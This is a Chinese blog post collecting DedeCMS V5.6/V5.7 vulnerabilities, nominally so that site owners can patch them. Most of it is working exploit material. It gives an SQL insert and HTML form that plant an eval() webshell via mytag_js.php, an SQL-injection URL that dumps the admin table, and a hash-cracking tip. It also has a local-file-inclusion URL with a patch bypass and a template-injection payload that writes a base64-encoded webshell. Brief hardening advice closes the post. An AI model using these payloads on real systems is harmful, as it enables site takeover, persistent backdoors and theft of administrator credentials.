Dedecms V5.6/V5.7漏洞问题收集总结
发布:smiling 来源: PHP粉丝网 添加日期:2014-03-12 10:43:59 浏览: 评论:0
昨天自己的一个网站中毒了,花了N天时间没有找出来,前天没事搜索了一下dedecms漏洞,结果发现V5.6/V5.7漏洞一堆一堆的,下面我收集了现在Dedecms V5.6/V5.7漏洞问题,大家保参考然后进行修补吧.
DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)
前题条件,必须准备好自己的dede数据库,然后插入数据,以下是引用片段:
- insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php,原理自己研究,以下是引用片段:
- <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
- <input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
- <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
- <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
- <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
- <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- <input type="text" value="true" name="nocache" style="width:400">
- <input type="submit" value="提交" name="QuickSearchBtn"><br />
- </form>
- <script>
- function addaction()
- {
- document.QuickSearch.action=document.QuickSearch.doaction.value;
- }
- </script>
此问题官方还没有解决办法,个人建义删除mytag_js.php文件,并把数据表中的XX_mytag表的中的text类开的字段修改,并且限制最多为1字节.
DedeCms V5.6注入+本地包含0day
一、advancedsearch.php注入0day
plus/advancedsearch.php
$sql 变量未初始化,导致鸡助注入,原理不多说自已百度去,直接EXP,代码如下:
http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede的密码破解方法是32位MD5减去头5位,减去尾七位,得到20MD5密码,方法是,前减3后减1,得到16位MD5.
二、carbuyaction.php本地包含鸡助0day
漏洞文件:plus/carbuyaction.php
还是原理不多说自已百度去,直接EXP,代码如下:
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../
如果打了补丁在cookie中加上code=alipay继续使用,再暴一个BUG,直接访问如下地址
http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx
暂时没什么利用价植,BUG一个.
DedeCms v5.6 恶意代码执行漏洞
DedeCms v5.6漏洞描述:
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用,测试方法:注册会员,上传软件,本地地址中填入
a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行,代码如下:
a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话,密码xiao 大家懂得SEBUG安全建议:
厂商补丁:DEDECMS
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本.
个人教训:我们可把upload,data目录设置不可执行和php文件,plus目录设置不要写任何文件,把不要的文件删除,模板目录最好也不可以上传和修改任何文件.
Tags: Dedecms V5 6 V5 7漏洞
相关文章
- ·dedecms漏洞防护(2013-11-15)
- ·DedeCMS Error: (PHP 5.3 and above) Please set request_or (2013-11-15)
- ·dedecms文章内容页中的收藏功能收藏的文章路径错误问题解决(2013-11-15)
- ·给织梦DedeCMS文章标题增加自动加长尾关键词的方法(2013-11-15)
- ·dedecms列表页上一页下一页翻页单独调用(2013-11-15)
- ·dedecms php.ini register_globals must is Off(2013-11-28)
- ·dedecms 问答系统如何取消积分与用户登陆验证(2013-11-28)
- ·dedecms上传图片文件时提示 Upload filetype not allow(2013-12-04)
- ·DedeCMS图集中缩略图不能显示的解决方法(2014-01-09)
- ·安装dedecms:Call to undefined function get_magic_quotes_gpc()(2014-01-09)
- ·Dedecms怎么在首页调用最新评论(2014-01-09)
- ·dedecms自定义模型之独立模型在首页、列表页、内容调用内容(2014-03-11)
- ·织梦DedeCMS子目录移动到根目录的方法(2014-03-11)
- ·DEDECMS织梦短标题标签调用与字数修改方法(2014-03-11)
- ·织梦DedeCMS列表摘要 description 长度控制方法(2014-03-11)
- ·dedecms5.6,5.7去掉系统默认的友情链接链(2014-03-11)
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)